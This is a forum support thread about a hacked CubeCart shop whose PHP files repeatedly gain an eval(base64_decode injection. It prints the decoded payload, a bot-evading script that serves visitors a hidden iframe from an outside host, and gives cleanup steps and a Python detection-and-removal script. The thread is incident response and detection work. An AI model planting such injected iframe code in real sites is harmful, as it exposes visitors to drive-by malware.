Need help with eval(base64_decode hack

Guest

Hello,

For a couple of days now my shop hasn't been working; the URL is: http://www.victorianscarlettdesigns.com/shop/ I get the announcement "Parse error: syntax error, unexpected '<' in /public/sites/www.victorianscarlettdesigns.com/shop/includes/content/index.inc.php on line 1" and when I check this file it indeed shows me an eval(base64_decode plus lots of figures at the very top of the file. I removed it and my shop was working again, but later on it mysteriously returned and my shop went down again. I have since done everything that was mentioned in the important announcement for CC3 users concerning the hack of the base files, which are downloadable from the CC website, and all seemed to go well for a while, but after a few hours the eval(base64_decode returned to the index.inc.php file again (but there were fewer characters and figures now, so I think the changes I made that were mentioned in the announcement post did part of the trick!). The problem is that the code keeps popping back into the index.inc.php file and I can't seem to find the reason why. I tried using a base64 decoder but I don't understand how I might be able to see which files I need to remove/alter to get my shop working again. Unfortunately I don't have a backup that's 100% trustworthy because I'm still working on my shop and I'm doing this together with an overseas friend, so making a consistent backup is difficult :(

Can anybody help me with this? The code that keeps coming back at the top of the index.inc.php file is this:

```php
<?<?php eval(base64_decode('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'));

/*
```
And when I use this decoder here: http://www.motobit.com/util/base64-decoder-encoder.asp it gives me this in return:
```php
error_reporting(0);
$bot = FALSE ;
$user_agent_to_filter = array('bot','spider','spyder','crawl','validator','slurp','docomo','yandex','mail.ru','alexa.com','postrank.com','htmldoc','webcollage','blogpulse.com','anonymouse.org','12345','httpclient','buzztracker.com','snoopy','feedtools','arianna.libero.it','internetseer.com','openacoon.de','rrrrrrrrr','magent','download master','drupal.org','vlc media player','vvrkimsjuwly l3ufmjrx','szn-image-resizer','bdbrandprotect.com','wordpress','rssreader','mybloglog api');
$stop_ips_masks = array(
	array("216.239.32.0","216.239.63.255"),
	array("64.68.80.0"  ,"64.68.87.255"  ),
	array("66.102.0.0",  "66.102.15.255"),
	array("64.233.160.0","64.233.191.255"),
	array("66.249.64.0", "66.249.95.255"),
	array("72.14.192.0", "72.14.255.255"),
	array("209.85.128.0","209.85.255.255"),
	array("198.108.100.192","198.108.100.207"),
	array("173.194.0.0","173.194.255.255"),
	array("216.33.229.144","216.33.229.151"),
	array("216.33.229.160","216.33.229.167"),
	array("209.185.108.128","209.185.108.255"),
	array("216.109.75.80","216.109.75.95"),
	array("64.68.88.0","64.68.95.255"),
	array("64.68.64.64","64.68.64.127"),
	array("64.41.221.192","64.41.221.207"),
	array("74.125.0.0","74.125.255.255"),
	array("65.52.0.0","65.55.255.255"),
	array("74.6.0.0","74.6.255.255"),
	array("67.195.0.0","67.195.255.255"),
	array("72.30.0.0","72.30.255.255"),
	array("38.0.0.0","38.255.255.255")
	);
$my_ip2long = sprintf("%u",ip2long($_SERVER['REMOTE_ADDR']));
foreach ( $stop_ips_masks as $IPs ) {
	$first_d=sprintf("%u",ip2long($IPs[0])); $second_d=sprintf("%u",ip2long($IPs[1]));
	if ($my_ip2long >= $first_d && $my_ip2long <= $second_d) {$bot = TRUE; break;}
}
foreach ($user_agent_to_filter as $bot_sign){
	if (strpos($_SERVER['HTTP_USER_AGENT'], $bot_sign) !== false){$bot = true; break;}
}
if (!$bot) {
echo '<iframe src="http://sgsdgsg.vv.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAwcCAQMMAw==" width="1" height="1"></iframe>';
}
```

I have tried many things, and tried searching all the files of my shop for more files that have these eval(base64_decode codes at the top, but there were none. I only found out that one of the mods I have for viewing images in JavaScript (from Estelle) contains an eval(base64_decode, but it's not at the top of the page, and if I remove this, the extra pictures shown with every item disappear. But that may also be because I unknowingly remove too much of the code.

Please help me if you can, it's much appreciated because I'm kind of at my wit's end with this and want to solve it so badly!

Thank you very much!


I can certainly try to help. The first thing would be for you to look at the timestamps of every file in the CC installation and note any files that do not have a reasonable date. An unreasonable date would be any file with a date not like the others, and that you know you haven't modified it. Yes, I know this will take some minutes to do.


> I can certainly try to help. The first thing would be for you to look at the timestamps of every file in the CC installation and note any files that do not have a reasonable date. An unreasonable date would be any file with a date not like the others, and that you know you haven't modified it. Yes, I know this will take some minutes to do.

Thank you so much for trying to help! It's very difficult to determine whether or not I or my friend was the one who altered the files with different dates, but I just checked every single file for an unreasonable date. As far as I can see, and as far as I can think back to know if and, if so, what I've done for my shop on those dates, I haven't been able to find a date on a file that wouldn't need to have that date :( I did find a folder named Cache in the Admin folder which contains a file with an unreadable name (random characters), maybe that's something? I also found the eval(base64_decode (followed by random characters) in 2 files that are connected to the JavaScript images review mod from Estelle.

Maybe I need to search for certain unreasonable files or something?

Thank you, I really appreciate your help!


Thanks to bsmither we found out what the problem was, my shop is now working again! I would like to close this thread, but I don't know how to add a [resolved] to the title of this post.


Hi, I am also having eval()'d code:37) problems. I am receiving the errors

"Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /home.../public_html/store/index.php(1) : eval()'d code:37) in /home/.../public_html/store/includes/sessionStart.inc.php on line 39

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /home/.../public_html/store/index.php(1) : eval()'d code:37) in /home.../public_html/store/includes/sessionStart.inc.php on line 39

Warning: Cannot modify header information - headers already sent by (output started at /home/.../public_html/store/index.php(1) : eval()'d code:37) in /home.../public_html/store/includes/session.inc.php on line 95"

I know the site has been hacked and I have followed the instructions at Important CubeCart v3 Security Announcement but I am still getting the above errors.

Please help :cry:


Look for these files and delete if found:

/store/images/uploads/thumbs/imageth.php

/store/images/uploads/random/chars/T.php

Scan your files looking for any file that has a file date of a few days ago. These will be damaged files. If you know that *you* edited it (installing a mod, for example), then it may be ok.

Look for a line of gibberish that appears on the top line and delete everything on that line except for <?php.

Also look for code at the bottom of the file that looks like:

?><?php eval(base64_decode(...

and delete everything after the ?>

Fix the following files (if damaged):

/store/index.php

/store/includes/content/index.inc.php

/store/includes/boxes/siteDocs.inc.php

/store/languages/nl/lang.inc.php

Delete your installation directory if it still exists.

Because your store is a sub-directory of your main site, files in your main site and other sub-directories may have been damaged. Scan for file dates of a few days ago in all folders as well.

Send me a Private Message if you wish personal assistance.

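Added example (mine, not code from this thread or from CubeCart) of the checklist above as a script: it walks a store directory for PHP files carrying eval(base64_decode(, decodes each blob to report which of the tell-tale strings from the payload pasted earlier in the thread it contains, and applies the two cleanups bsmither describes (top line back to `<?php`, everything after the `?>` that precedes an injected tail removed). The sample tree, its file contents and the example.invalid URL are constructed for the demo; the function names are my own.

```python
import base64
import re
import tempfile
from pathlib import Path

EVAL_RE = re.compile(r"eval\(base64_decode\('([A-Za-z0-9+/=]+)'\)\)")
TAIL_MARK = "?><?php eval(base64_decode("
INDICATORS = ("error_reporting(0)", "$stop_ips_masks", "HTTP_USER_AGENT", "<iframe")

def classify(text):
    """Sorted INDICATORS found in any decoded eval(base64_decode('...')) in text."""
    found = set()
    for blob in EVAL_RE.findall(text):
        try:
            php = base64.b64decode(blob, validate=True).decode("latin-1")
        except ValueError:  # malformed base64: nothing to inspect, file is still a hit
            continue
        found.update(i for i in INDICATORS if i in php)
    return sorted(found)

def strip_injection(text):
    """bsmither's two cleanups: a top line carrying the eval becomes '<?php'; everything
    after the '?>' that opens an injected tail is dropped."""
    lines = text.split("\n")
    if lines and "eval(base64_decode(" in lines[0]:
        lines[0] = "<?php"
    head, mark, _ = "\n".join(lines).rpartition(TAIL_MARK)
    return head + "?>\n" if mark else "\n".join(lines)

def scan_tree(root):
    """{relative path: indicators} for each .php file under root carrying the marker."""
    files = sorted(Path(root).rglob("*.php"))
    texts = {p.relative_to(root).as_posix(): p.read_text(encoding="latin-1") for p in files}
    return {n: classify(t) for n, t in texts.items() if "eval(base64_decode(" in t}

def demo():
    """Constructed sample tree (not the poster's files): scan it, then clean each hit."""
    payload = base64.b64encode(b"error_reporting(0); if(!$bot){echo '<iframe src=\"http://example.invalid/\"></iframe>';}").decode()
    top = f"<?<?php eval(base64_decode('{payload}'));\n/* original */\n$x = 1;\n"
    bottom = f"<?php\n$y = 2;\n?><?php eval(base64_decode('{payload}')); ?>\n"
    with tempfile.TemporaryDirectory() as root:
        d = Path(root) / "store" / "includes"
        d.mkdir(parents=True)
        (d / "index.inc.php").write_text(top)
        (d / "session.inc.php").write_text(bottom)
        (d / "clean.php").write_text("<?php\n$z = 3;\n")
        hits = scan_tree(root)
        cleaned = {n: strip_injection((Path(root) / n).read_text()) for n in hits}
    return hits, cleaned
```

Run scan_tree against a copy of the store first and review each hit before writing the cleaned text back; a file whose first line is legitimately more than `<?php` needs a manual fix rather than strip_injection.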

  • 2 weeks later...

> Thanks to bsmither we found out what the problem was, my shop is now working again! I would like to close this thread, but I don't know how to add a [resolved] to the title of this post.

Raven, Raven, Raven, for goodness' sake don't close the thread without telling us what the problem was and how you found it!!!!

This is a very widespread hack that has caused me and many other people no end of problems in the past fortnight.

There is a good article at http://blog.unmaskparasites.com/2011/03/02/versatile-cc-attacks/ which describes what I think is the same attack.
